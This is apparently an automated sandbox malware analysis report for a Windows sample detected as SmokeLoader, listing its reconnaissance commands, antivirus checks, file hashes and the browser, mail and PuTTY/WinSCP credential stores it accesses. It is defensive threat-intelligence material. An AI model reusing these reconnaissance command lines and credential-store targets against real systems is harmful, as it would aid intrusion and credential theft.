Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv

Source: explorer.exe, 00000002.00000000.1506409569.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1504842571.00000000044D0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.1506409569.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd]1Q

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 11_2_00C855EB cpuid

11_2_00C855EB

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: GetLocaleInfoA,		33_2_00408EA0
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: GetLocaleInfoA,		34_2_00408EA0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

0_2_00418C80

Source: C:\Windows\SysWOW64\explorer.exe

11_2_00C32198

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
OCYe9qcxiM.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1522699
Product:	CloudBasic
Start time:	15:36:26
Start date:	30.09.2024
Sample:	OCYe9qcxiM.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	2a6994149baff1e680719f89062bfcc7
SHA1:	62abd53b0db022f2d20cb7ba5e1f2373753ecba1
SHA256:	ce434bc783d75cceafbddd59dd3ed43d4bf1811e0344ba5fdc6958af146254e7
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\354F.exe	PE32+ executable (GUI) x86-64, for MS Windows	815279E7D757D334D6E9EF9B249CA705	6EFA4A8B6B1208C1577E1853AC7B37516028C260	ADDFF5036F4E03D01A52B7F093344DE06808847B09939E06465DBA47A8A90D73
C:\Users\user\AppData\Local\Temp\4470.exe	PE32 executable (GUI) Intel 80386, for MS Windows	D07C1E0124B1CFA23AA3699216AA912F	1AA10CD574851FF97C478E782272AE92E921BC3D	61F92984F8DB5F32D43674012697FBDEF0224811AB64FB30759CC66454FB03AD
C:\Users\user\AppData\Local\Temp\E276.tmp	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\Users\user\AppData\Local\Temp\E276.tmp-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Local\Temp\E7F5.tmp	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Local\Temp\ECAA.tmp	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\Users\user\AppData\Local\Temp\ED86.tmp	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	BE99679A2B018331EACD3A1B680E3757	6E6732E173C91B0C3287AB4B161FE3676D33449A	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
C:\Users\user\AppData\Local\Temp\EE52.tmp	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	64BCCF32ED2142E76D142DF7AAC75730	30AB1540F7909BEE86C0542B2EBD24FB73E5D629	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
C:\Users\user\AppData\Local\Temp\EF9B.tmp	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\Users\user\AppData\Local\Temp\F0F4.tmp	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\Users\user\AppData\Local\Temp\F1A1.tmp	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	EFD26666EAE0E87B32082FF52F9F4C5E	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
C:\Users\user\AppData\Roaming\dugwjjb	data	75E62AC701925290EBAA3F00A997E3A3	40BC204B041F98F05986BE6F427BB99C5C56EE2B	A222B4A9482E2D85502214D13ACDB9B89F11299C2B763DDFA5EF5FB42A5389F2
C:\Users\user\AppData\Roaming\fihcrfb	PE32 executable (GUI) Intel 80386, for MS Windows	D07C1E0124B1CFA23AA3699216AA912F	1AA10CD574851FF97C478E782272AE92E921BC3D	61F92984F8DB5F32D43674012697FBDEF0224811AB64FB30759CC66454FB03AD
C:\Users\user\AppData\Roaming\hehcrfb	PE32 executable (GUI) Intel 80386, for MS Windows	2A6994149BAFF1E680719F89062BFCC7	62ABD53B0DB022F2D20CB7BA5E1F2373753ECBA1	CE434BC783D75CCEAFBDDD59DD3ED43D4BF1811E0344BA5FDC6958AF146254E7
C:\Users\user\AppData\Roaming\hehcrfb:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309

Windows Analysis Report OCYe9qcxiM.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
OCYe9qcxiM.exe

Malware Threat Intel
Provided by